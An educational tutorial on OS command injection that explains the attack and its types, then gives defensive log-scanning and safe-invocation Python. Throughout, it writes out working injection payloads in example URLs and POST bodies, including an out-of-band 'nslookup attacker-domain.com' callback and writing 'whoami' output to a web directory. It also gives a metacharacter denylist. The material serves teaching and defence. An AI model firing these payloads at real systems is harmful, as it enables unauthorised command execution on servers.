OS Command Injection

What is OS Command Injection?

OS Command Injection allows attackers to execute arbitrary operating system commands on a server by injecting malicious input into a vulnerable application. This occurs when user input is passed to a shell command without sufficient sanitization.

How It Works

The attacker manipulates user input to inject malicious commands. For example:

  1. Input is included in a backend command such as:

    stockreport.pl 432 32
  2. Malicious input like 432 & echo hello & modifies the command:

    stockreport.pl 432 & echo hello & 32

    This causes the shell to execute echo hello alongside the intended command: stockreport.pl 432 runs first, then echo hello, and finally the trailing 32 is run as a third command (which fails, but that does not matter to the attacker).

Types of OS Command Injection

1. Direct Injection

The output of the injected command is visible in the application response. Example:

https://insecure-website.com/stockStatus?productID=& echo hello &

If the response includes hello, the injection is successful.

2. Blind Injection

The output of the injected command is not visible in the response. Various techniques can be used to confirm execution:

  • Timing Attacks:

    • Inject a time delay to observe the response time.

      https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &
  • File Writing:

    • Write command output to a file accessible via the web.

      https://vulnerable-website.com/stockStatus?productID=& whoami > /var/www/static/whoami.txt &
  • Out-of-Band Interaction:

    • Trigger DNS lookups or HTTP requests to an attacker-controlled server.

      https://vulnerable-website.com/stockStatus?productID=& nslookup attacker-domain.com &

Injection Characters

The following characters can be used to inject commands:

Character       Usage
&               Execute multiple commands sequentially.
&&              Execute the next command only if the previous one succeeds.
;               Separate multiple commands.
Newline (\n)    Separate commands (Unix-specific).

Bash-Specific Characters:

  • ` (Backticks): Execute commands within the backticks.

  • $() (Subshell): Execute commands within the parentheses.
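As an added detection example (not part of the original page), the following Python scans access-log request targets for the metacharacters listed above, both percent-encoded (%26, %3B, %0a) and sent raw, as in the URLs on this page. The log lines, the field names and the "<bare>" marker are constructed for the example.

```python
from urllib.parse import unquote_plus, urlsplit

# Shell metacharacters from the table above plus the pipe from the prevention
# list. Longer tokens are checked first so "&&" is not reported as two "&".
SHELL_METACHARS = ("&&", "||", "$(", "`", "&", "|", ";", "\n")

def find_metachars(decoded):
    """Return the metacharacters present in one decoded query field."""
    found, rest = [], decoded
    for token in SHELL_METACHARS:
        if token in rest:
            found.append(token)
            rest = rest.replace(token, " ")
    return found

def scan_query(target):
    """Split the raw target on '&', decode each field separately, and flag fields
    with metacharacters or bare fields (what an unencoded '&' payload leaves)."""
    findings = []
    for field in urlsplit(target).query.split("&"):
        if not field:
            continue
        key, sep, raw_value = field.partition("=")
        value = unquote_plus(raw_value if sep else key)
        hits = find_metachars(value)
        if hits:
            findings.append((key if sep else "<bare>", value, hits))
        elif not sep and value.strip():
            findings.append(("<bare>", value, []))
    return findings

def scan_log(lines):
    """Return {line_index: findings} for access-log lines whose target is suspicious."""
    flagged = {}
    for i, line in enumerate(lines):
        parts = line.split('"')
        if len(parts) < 2 or len(parts[1].split(" ")) < 2:
            continue
        findings = scan_query(parts[1].split(" ")[1])
        if findings:
            flagged[i] = findings
    return flagged

# Constructed access-log lines (not from the page): a benign request, a
# percent-encoded payload, and an unencoded-'&' payload like the URLs above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2025:10:00:00 +0000] "GET /stockStatus?productID=432&storeID=32 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2025:10:00:01 +0000] "GET /stockStatus?productID=432%26whoami%3E/var/www/static/whoami.txt%26&storeID=32 HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2025:10:00:02 +0000] "GET /stockStatus?productID=&+ping+-c+10+127.0.0.1+& HTTP/1.1" 200 512',
]
```

Raw "&" in a payload is also the query-string separator, so a parameter parser sees an extra nameless field; the scanner reports that as "<bare>" rather than silently dropping it.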

Examples of OS Command Injection

Exploiting GET Parameters

  1. Echo Command Injection:

    https://insecure-website.com/stockStatus?productID=& echo hello &
  2. Timing-Based Blind Injection:

    https://insecure-website.com/stockStatus?productID=& ping -c 10 127.0.0.1 &

Exploiting POST Parameters

  1. Inject Commands into Form Fields:

    POST /submit-form HTTP/1.1
    csrf=token&name=test&email=test@example.com & sleep 10 #&subject=Testing
  2. Redirect Output:

    & whoami > /var/www/static/whoami.txt &

Useful Commands for Testing

Purpose                     Linux Command    Windows Command
Current user                whoami           whoami
Operating system            uname -a         ver
Network configuration       ifconfig         ipconfig /all
Open network connections    netstat -an      netstat -an
Running processes           ps -ef           tasklist

Advanced Techniques

Using Time Delays

Inject a delay to observe execution:

& sleep 10 &

Redirecting Output

Write command output to a file accessible via the web:

& whoami > /var/www/static/whoami.txt &

Out-of-Band Interaction

Trigger DNS or HTTP requests to an attacker-controlled server:

& nslookup attacker-domain.com &

How to Prevent OS Command Injection

  1. Avoid Shell Commands:

    • Avoid passing user input to shell commands.

    • Use high-level APIs or libraries to handle tasks like file operations or process management.

  2. Validate User Input:

    • Use a safelist to restrict allowed characters and commands.

    • Block special characters like &, |, ;, and ` (a denylist on its own is weaker than a safelist of allowed values).

  3. Sanitize Input:

    • Use escaping techniques appropriate to the shell environment.

  4. Use Strong Permissions:

    • Limit the application's ability to execute shell commands or access sensitive files.

  5. Employ Security Measures:

    • Use Web Application Firewalls (WAFs) to block malicious requests.
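As an added example (not the page's or PortSwigger's code), the Python below puts points 1 to 3 next to the vulnerable pattern from "How It Works": the string-concatenated command, shlex.quote escaping for the case where a shell is unavoidable, and the preferred path of safelist validation plus an argument list with no shell. stockreport.pl is replaced by an assumed stand-in (a Python one-liner that echoes its argv) so the block runs offline.

```python
import json
import re
import shlex
import subprocess
import sys

# Safelist for both stockreport.pl arguments: decimal digits only.
ID_RE = re.compile(r"[0-9]{1,10}")

# Stand-in for stockreport.pl so the example runs offline (assumed, not the real
# script): a Python one-liner that prints its argv back as JSON.
REPORT_ARGV = [sys.executable, "-c", "import json, sys; print(json.dumps(sys.argv[1:]))"]

def vulnerable_command(product_id, store_id):
    """The pattern from 'How It Works': input concatenated into one shell string.
    Returned, not executed; run with shell=True, the '&' characters in the
    payload would split it into separate commands."""
    return f"stockreport.pl {product_id} {store_id}"

def validate_id(name, value):
    """Point 2 (validate): reject anything outside the safelist rather than strip it."""
    if not ID_RE.fullmatch(value):
        raise ValueError(f"{name} rejected by safelist: {value!r}")
    return value

def escaped_command(product_id, store_id):
    """Point 3 (escape): if a shell string is unavoidable, quote each argument so
    metacharacters inside it are passed literally instead of interpreted."""
    return f"stockreport.pl {shlex.quote(product_id)} {shlex.quote(store_id)}"

def run_stock_report(product_id, store_id):
    """Point 1 (avoid the shell): validate, then invoke with an argument list and
    shell=False, so each value reaches the program as one literal argv entry."""
    args = [validate_id("productID", product_id), validate_id("storeID", store_id)]
    proc = subprocess.run(REPORT_ARGV + args, capture_output=True, text=True, check=True)
    return json.loads(proc.stdout)

def handle_request(product_id, store_id):
    """Return ('ok', argv seen by the program) or ('rejected', reason)."""
    try:
        return ("ok", run_stock_report(product_id, store_id))
    except ValueError as exc:
        return ("rejected", str(exc))

if __name__ == "__main__":
    payload = "432 & echo hello &"
    print(vulnerable_command(payload, "32"))  # the string a shell would have split
    print(escaped_command(payload, "32"))     # payload is now one quoted argument
    print(handle_request(payload, "32"))      # rejected before anything runs
    print(handle_request("432", "32"))        # ('ok', ['432', '32'])
```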
